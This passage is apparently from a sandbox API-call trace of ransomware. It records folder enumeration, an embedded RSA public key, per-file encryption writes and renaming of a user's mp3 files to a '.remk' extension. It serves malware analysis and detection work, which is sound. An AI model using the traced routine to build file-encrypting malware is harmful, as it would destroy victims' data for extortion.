ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0232.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.152] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0232.152] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0232.152] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned=".ini" [0232.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e568 | out: hHeap=0x630000) returned 1 [0232.152] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0232.152] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0232.152] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0232.152] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0232.152] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0232.152] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0232.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0232.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0232.153] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0232.153] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0232.153] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0232.153] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0232.153] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0232.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.153] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0232.153] PathFindFileNameW (pszPath="") returned="" [0232.153] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0232.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0232.153] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0232.153] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0232.153] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned=".ini" [0232.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693330 | out: hHeap=0x630000) returned 1 [0232.154] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0232.154] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned=".lnk" [0232.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693330 | out: hHeap=0x630000) returned 1 [0232.154] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0232.154] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned=".lnk" [0232.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693330 | out: hHeap=0x630000) returned 1 [0232.154] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0232.154] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned=".lnk" [0232.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693330 | out: hHeap=0x630000) returned 1 [0232.154] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0232.154] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0232.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0232.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5498 | out: hHeap=0x630000) returned 1 [0232.154] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0232.154] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0232.154] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0232.154] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0232.155] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0232.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.155] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0232.155] PathFindFileNameW (pszPath="") returned="" [0232.155] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0232.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0232.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0232.155] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0232.155] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0232.155] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0232.155] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0232.155] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0232.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.155] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0232.155] PathFindFileNameW (pszPath="") returned="" [0232.156] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbde11e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbde11e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0232.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0232.156] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbde11e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbde11e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0232.156] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x546384a0, ftCreationTime.dwHighDateTime=0x1d5db5c, ftLastAccessTime.dwLowDateTime=0x432941c0, ftLastAccessTime.dwHighDateTime=0x1d5e34a, ftLastWriteTime.dwLowDateTime=0x432941c0, ftLastWriteTime.dwHighDateTime=0x1d5e34a, nFileSizeHigh=0x0, nFileSizeLow=0x9f15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1W7m6.mp3", cAlternateFileName="")) returned 1 [0232.156] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1W7m6.mp3") returned=".mp3" [0232.156] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1W7m6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1w7m6.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.158] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=40725) returned 1 [0232.158] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.161] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x9eef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.161] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.163] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x9f15, lpOverlapped=0x0) returned 1 [0232.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.164] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0232.165] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.165] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.165] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.165] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.165] GetLastError () returned 0x0 [0232.165] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.165] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0232.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.165] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.165] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.165] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.166] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0232.166] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x9f15, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.166] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0232.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0232.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0232.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0232.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0232.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0232.167] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0232.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.167] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.167] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.167] CloseHandle (hObject=0x640) returned 1 [0232.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0232.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x37b5b70 [0232.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0232.171] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1W7m6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1w7m6.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1W7m6.mp3.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1w7m6.mp3.remk")) returned 1 [0232.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.172] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693330 | out: hHeap=0x630000) returned 1 [0232.174] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fe0b980, ftCreationTime.dwHighDateTime=0x1d5e6be, ftLastAccessTime.dwLowDateTime=0x8da456a0, ftLastAccessTime.dwHighDateTime=0x1d5de5d, ftLastWriteTime.dwLowDateTime=0x8da456a0, ftLastWriteTime.dwHighDateTime=0x1d5de5d, nFileSizeHigh=0x0, nFileSizeLow=0x833a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4KMSMI.mp3", cAlternateFileName="")) returned 1 [0232.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0232.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0232.174] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4KMSMI.mp3") returned=".mp3" [0232.174] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4KMSMI.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4kmsmi.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.174] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=33594) 